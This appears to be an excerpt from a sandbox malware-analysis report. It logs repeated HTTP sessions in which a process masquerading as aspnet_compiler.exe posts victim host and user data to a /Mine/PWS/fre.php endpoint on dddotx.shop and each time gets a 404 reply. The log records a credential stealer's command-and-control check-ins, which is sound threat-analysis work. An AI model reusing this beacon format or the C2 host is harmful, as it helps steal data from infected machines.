Sep 25, 2024 15:29:51.275609016 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeMbbF1sJ%2Bkk94cfnXUI22v9KXJWMYnXuHgfjTzEJr1RksD6SR3CLm3y8GXSqsTwAaPePkm38Zd3KLgWDndgMEfVMDVzvVBTq78%2FCph0kLyER62u79xvUJDuqA%2BT2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d8d6c79236a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	55956	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:51.423162937 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:51.428231955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:52.197736025 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w65a9baz1SGNB38%2BgIdgTvV7fgR1PzV%2BMjbs9PTsfA3qs0UqKcFFyEKSpnVWRYYQEq18qbxVIatvgLpx3aZElxZ94tpiQpO00vK3SI6qe6ShfDM7hOJdGsPGs2eZAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d930c9b4269-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	55957	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:52.536717892 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:52.541642904 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:53.229687929 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EiiqL1NQ%2BN6k6mMNo9551mkGQokA1OdCvguvpuljgV5W%2BNpdlFM31k6%2Bp2qC%2BkCaCoFNjQPxem5zfZDagXYwziZwiKHueaUG0Xd3%2Ba3IwoOflYD0C3Eoj1aJMIPyw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d99df11236b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	55958	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:53.377525091 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:53.383135080 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:54.101306915 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JM0U4PfE0tXGtJN7lBayWhkKXsYVURvvYEVobOSvnpX%2B6k8kj%2BvAMzn2htI5MHqQ5B8iDFPf1VeEIucHiYhq7lkZlfscp4KzqYzVjngOhgAKGL862AwGKBjy0uROcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d9f4db58c41-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	55959	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:54.253329039 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:54.258505106 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:54.970730066 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfAjUqIopytgIuz4TBN8taqHwipOnZBYUiZq1SYTbvdqadgpz4maPQqeOtSmx%2F3XJuZ7GxTM0nup5l0mBMNKDrljZSK%2Fgu%2BsCOXsnhvFzcNpBSajdlCQN7lvC1XGTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5da4aaf142ee-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	55960	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:55.418677092 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:55.425796032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:56.064028978 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NuHDP%2FSz%2FYtQ6ljfcB%2FI0KNXNJB7VVaA88KYoNdhTLaaeXHEqftF62DTtGg4R2fgq9Q0JSpXmL5cXbjp%2FCqMEKpqfDZ45c%2FsxfO1OKDMBY5i6s%2FCa6dBjI1Z7PviQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dabdbdb433e-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	55961	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:56.219639063 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:56.224618912 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:56.901269913 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hE9Wj%2BDYe9ODDjg4DBv7mhNm06WC8r%2FDLTOBZG81JyReIO%2FZeagdtj8bo799760FHrIzyuoLfKkuvsESeXnoL4%2B%2BI8tZvIvDWL%2FZrkUQdW2wWdjVwbJLPs9Au8CDIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5db0e82f43b2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	55962	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:57.047328949 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:57.052272081 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:57.735141993 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REiRSDWyVSWIPBadI0g69aNy0idqBIRTK00f9sCrffQ8j8n%2Fs9aUyOuJMtGzcyJaqjh6hVUyIUpxa1rbFxvTEFRBm0zZrVmMdPmDXl4M1dLC6hu30yYuZOPYDhd%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5db619bb8c96-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	55963	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:58.156909943 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:58.164944887 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:58.842067957 CEST	593	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTmzMNkALUXfi3OAlPa0Geya5BIdJEC0YO0cOYAfySs8zbgQ3UEWZVgy4RjuBjpPulyAvEZ98Wjrwl2F5pSZSJSS8Sb%2FW0gyEjfRUo27VxqAmkPxOpi7lXYoa78JRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dbcfd198c3b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	55964	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:58.983046055 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:58.987926960 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:59.669751883 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OtQ1e2FVoKBPovdiM%2FBiCE3ZNQKym9kfJv5Jd89DovBhjFmrCL8%2BWSLg2FZsxPHJuQDATP1u9FcvYO6xNMzkIKezqO8h9fHP5c78nObwv1KyHFgxRfrAp6e54YGmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dc22aa77274-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	55965	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:59.830913067 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:59.835834980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:00.558449030 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8VVF%2FVxdUl%2FJj53OhNXtHf8Nt3cNyxbHEAFTZOF9XlbjCX5ce7%2FX66ES6DFsoi2xqCqllaDroTpEvWIxQdtwD13QcmGkK43Bh3xo9rNzXxRnvqStnxboROkHAw7Sqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dc77d3d41b4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	55966	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:00.711074114 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:00.716017962 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:01.627257109 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inOSrd7lx4eBh4mSH7pHRpmG6%2FnA%2B2ib%2F79XDDsArvENTJ0xyhnXTDuesn28GyKqKvbScADSuXudKGUEGc%2BKEf43jDGdnbMDwdFvaiz2xnGx8Rvo8jBYaV0w9iuRkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dcd1aea1a03-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	55967	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:01.915862083 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:01.920768023 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:02.596066952 CEST	575	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNzKxb2UjThXAihmXlBuPbTBP%2FH3%2FOn%2BXm5M0v%2FVxTIaM%2FR0ZTwf0XVMF8jzqXqeBgk6uVyIZ8A5zvApYZ75Q3gAFbhTdqZ%2BWXyEu9ZyVHL7H93oDY%2FtoQaAtxEhMQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dd4797a8c81-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	55968	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:02.754868031 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:02.761282921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:03.523556948 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ncYTqk%2FjINLzSoK9LvKxkZGM6Lw5HzdbedsrYuSjQdrORnrNnei6gCMYqx2c8D%2FL9jMFq8Kcr3tDbJ6qd4gounLmBQrnoAVaJuIuApw24PCJt05cxTIf%2FFCL080dQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dd9dc237295-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	55969	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:03.941581011 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:03.946516037 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:05.068569899 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=labFOlz3POAGK9xMitwT4rHu6BorhVrCYhSKMa023ZVtDDq18wwmtu50b2azJDP7D4mgtK0y5l1WVUUss7H3VAbLtKrDeCwQdtwAkNSiNAd6k8JSRLpVFrG%2FrmS1Cg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5de0b82642bb-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	55970	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:05.220174074 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:05.226429939 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
